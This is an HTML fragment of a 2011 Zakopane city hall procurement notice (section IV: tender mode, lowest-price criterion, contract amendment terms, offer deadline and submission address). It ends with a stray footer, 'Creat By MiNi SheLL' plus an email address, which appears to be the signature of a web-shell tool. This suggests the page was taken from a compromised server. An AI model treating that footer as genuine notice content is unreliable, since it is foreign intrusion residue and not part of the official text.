<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający  uprzejmie informuje, ze przewiduje możliwość zmiany  istotnych postanowień zawartej umowy  w przypadku zwłoki, z przyczyn  nie leżących po stronie Wykonawcy, spowodowanej przedłużaniem się procedur administracyjnych, lub przedłużającymi się uzgodnieniami Zamawiającego z właścicielami terenu przeznaczonego pod inwestycję, Zamawiający dopuszcza przedłużenie terminu wykonania umowy w formie aneksu, z zachowaniem przepisów ustawy o finansach publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Rozwoju Lokalnego i Inwestycji pok.20
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2011 godzina 12:00, miejsce: Biuro ds zamówien publicznych pok.8
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com